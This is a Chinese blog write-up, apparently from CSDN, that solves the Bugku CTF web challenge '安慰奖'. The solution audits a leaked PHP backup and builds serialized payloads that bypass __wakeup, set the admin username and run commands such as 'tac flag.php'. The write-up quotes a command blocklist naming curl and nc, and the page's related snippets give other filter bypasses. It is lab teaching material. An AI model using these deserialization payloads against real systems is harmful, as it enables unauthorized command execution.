bugku-web-安慰奖

最新推荐文章于 2022-12-30 22:35:01 发布
最新推荐文章于 2022-12-30 22:35:01 发布
阅读量776 收藏 4
点赞数 2
文章标签: 前端 php 开发语言 php反序列化 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57954651/article/details/127866733
版权

题目没给提示

 点开链接  是空白页面

 查看源代码

 base64加密  拿去解码

 备份文件    使用工具跑一下目录    (dirsearch)

存在一个flag.php文件  但是访问没有结果

锁定index.php.bak 文件     下载下来

打开  进行代码审计   是php序列化  反序列化的内容

 代码审计(借鉴大佬的解析)

class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    定义username和cmd变量
----------------------------------------------
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    java知识
----------------------------------------------
    function __wakeup()
    {
        $this->username = 'guest';
    }
反序列化的wakeup函数  如何绕过可见我这篇文章
此处是将username的值改为guest

---------------------------------------------
   if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
       一堆正则
----------------------------------------------
 if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
 如果username的值为admin将cmd的值传给a变量并输出执行
----------------------------------------------
    $select = $_GET['code'];
    $res=unserialize(@$select);
  get获取code的值传给select并把select的值反序列化后传给res


唯一可以传的是code的值 所以用code里面包含username和cmd即可传值给他们因为类名是ctf   

还要绕过wakeup  确保传入的username和cmd的值正确  在die()的时候就会调用__destruct()函数 

来执行cmd命令

   所以构造为

(/?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";})

O 代表对象 因为我们序列化的是一个对象
3 代表类名字占三个字符
ctf 类名
3 代表三个属性,因为需要绕过__wakeup()函数,所以比实际属性个数2大
s代表字符串
11代表属性名长度
username 属性名
s:5:“admin” 字符串 属性值长度 属性值

先用ls看看  确定刚刚没打开的flag.php在不在同一目录下

确定flag.php就在当前目录

但是很多命令被过滤了  测试后  发现tac这个命令还没有被过滤    (/?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac%20flag.php";})

 使用tac命令得到flag

:Carmelo Anthony
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUGKU——安慰
doraemon12345的博客
06-08 215
昨天刚写了一道绕过_wakeup()函数的题目今天又遇到一道,刚好拿来复习一下 _wakeup()函数在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过_wakeup()函数的执行 打开题目发现是个空白页面,查看一下源码,有个base64解码,解密出一个单词,意思是备份,然后尝试下载备份,这里有几种方式,因为不知道是哪种,就一 一尝试 网站源码:www.zip .bak文件:xxx.bak(一般题目会提示文件名,不提示就尝试index.php.bak) vim缓存:xxx.swp意外退出为xxx
bugku web 安慰
m0_58189778的博客
08-19 327
题目:安慰 知识点:php反序列化 工具: 解题: 点开链接: 空白页面,然后查看源码,发现注释中有base64,解码得到backups,故猜测应该是和备份文件有关。 用御剑扫描,发现index.php.bak,下载打开: 先分析这个类,大致观察一下能拿到flag的地方就是__destruct中的反引号,这里执行了类的cmd属性;再看到后面的反序列化,这里应该是要构造相应的序列化字符串,当__destruct自动执行时命令执行即可。构造payload需要注意的是代码中过滤了.
Bugku_安慰
CaiNiaoLW的博客
02-27 632
打开页面,发现是空白的,查看源码,发现一段base64加密的密文, 解密后是backups单词,这个意思是备份,可以猜测是跟index.php.bak文件有关,下载下来备份文件后,获得后台代码,开始代码审计。 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $user
Bugku安慰
qq_46230755的博客
01-30 367
打开来查看源代码发现提示 YmFja3Vwcw== base64解码后得到:backups 扫描一下网站 在index.php.bak找到备份文件 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd
BugKu_安慰
羽的博客
07-02 178
解码 告诉我有备份文件。 找到这个 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u...
bugku】-安慰
weixin_52116519的博客
04-01 785
考点1:绕过__wakeup() 当序列化字符串表示对象属性个数的值大于真实个数的属性时,就会跳过__wakeup()的执行。 考点2:私有属性绕过 ①protected属性被序列化的时候属性值会变成:%00*%00属性名。 private属性被序列化的时候属性值会变成:%00类名%00属性名。 ②直接url编码输出。 考点3:``反引号,可以作为系统命令输出给var_dump $a = `$this->cmd`; var_dump($a); 解题 1、看源码 2、base64解码,是“备份”的意
bugku web-安慰-考查反序列化和魔术方法
weixin_46578840的博客
09-04 299
打开网址发现一片空白 审查源代码发现一串base,解码得到备份 打开查看发现源代码, <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __
console:XMPP控制台-Web和终端
05-23
安慰 XMPP控制台,终端和Web界面。 安装 npm install -g @xmpp/console 用法 Usage $ xmpp-console [service] Options --port, -p 8080 port for the web interface --web, -w use web interface --no-open, ...
php代码-php概率
07-16
假设我们有N个品,其中一等1个,二等2个,三等3个,剩下的N-6个为安慰。那么,一等的概率是1/N,二等的概率是2/N,三等是3/N,而安慰的概率是(N-6)/N。在PHP中,我们可以使用rand()或mt_rand()...
TFT-SD例程及资料
10-09
STM32是一款基于ARM Cortex-M内核的微控制器,由意法半导体(STMicroelectronics)生产,广泛应用在嵌入式系统设计中。标题中的"TFT-SD例程及资料"表明我们将探讨如何在STM32平台上使用TFT(Thin Film Transistor)...
假针刺对照设计新法初探--目标疾病导向安慰
02-20
假针刺对照设计新法初探--目标疾病导向安慰法,郑文科,卞兆祥,针刺安慰对照设计是目前研究者面临的难题,既有的安慰针刺方法均存在各种缺陷,无法充分体现针刺的真实疗效,难以消除安慰剂效应
Bugku WEB 安慰
qq_41696858的博客
07-18 226
<?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($username,$cmd)
Bugku CTF 每日一题 安慰
彼岸花苏陌的博客
01-19 650
安慰 打开网页啥都没有 习惯性按f12发现一段base64,解码后发现是 YmFja3Vwcw== backups(备份) 于是想到了网站备份,但是备份目录忘了 于是用dirsearch扫了一下 发现是index.php.bak 于是下载源码发现是代码审计 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class
bugku 安慰
濯君
12-31 1939
打开网页,发现什么也没有,查看源码,发现YmFja3Vwcw==,base64解码,得到backups 查看根目录下index.php.bak文件,得到代码 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hac.
bugku安慰(绕过__wakeup)
EC_Carrot的博客
12-24 932
题目 右键源代码发现<!-- YmFja3Vwcw== -->,base64解码提示说有备份 我这里用dirsearch扫到备份文件为index.php.bak 源码: error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u
三十七、bugku安慰
山兔的博客
09-05 152
打开网页,一片空白,查看源码,发现YmFja3Vwcw==,base64解码得到backups。 用御剑土司没跑出来,御剑1.5跑出来了/flag.php,/index.php.bak。 下载文件,得到了源码,发现是考序列化和反序列化。 百度搜索相关知识, _wakeup()当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过_wakeup()的执行。 序列化就是将对象转换成字符串。字符串包括属性名、属性值、属性类型和该对象对应的类名。反序列化则相反将字符串重新恢复成对象。 对象的序列化利于对象的
Bugku Web 安慰
JJT
05-11 209
Bugku Web 安慰   进入场景一片空白,查看源码发现YmFja3Vwcw==用base64解码得到backups,所以需要查看备份文件,用御剑扫描网站页面,发现了index.php.bak,访问后得到了一段如下的代码 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $u
CTFSHOW-命令执行
Monica的博客
09-03 4051
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
命令执行web入门
最新发布
2201_75316477的博客
12-30 1450
我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。如果对取反不了解可以百度一下,这里给个容易记得式子,如果对a按位取反,则得到的结果为-(a+1),也就是对0取反得到-1。其中%09,%26不受数字被过滤的影响,因为在加载时%09,%26会被解码为空格和分号,也就没有了数字。过滤了冒号,不能用伪协议了,没有过滤英文状态的**()** 和**;这下好了,过滤了字母,但是数字没有过滤,数字?
HSK5词汇列表:中文-英语词汇表
6. ਞ౏ānwèicomfort:该词汇表明了对某人的安慰和慰问。 7. ਞᤰānzhuānginstall:该词汇表明了将某物安装或设置在某个地方。 8. ಩ൎbǎwògrasp;seize:该词汇表明了对某物的抓住或夺取。 9. ಩ൎbǎwò...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值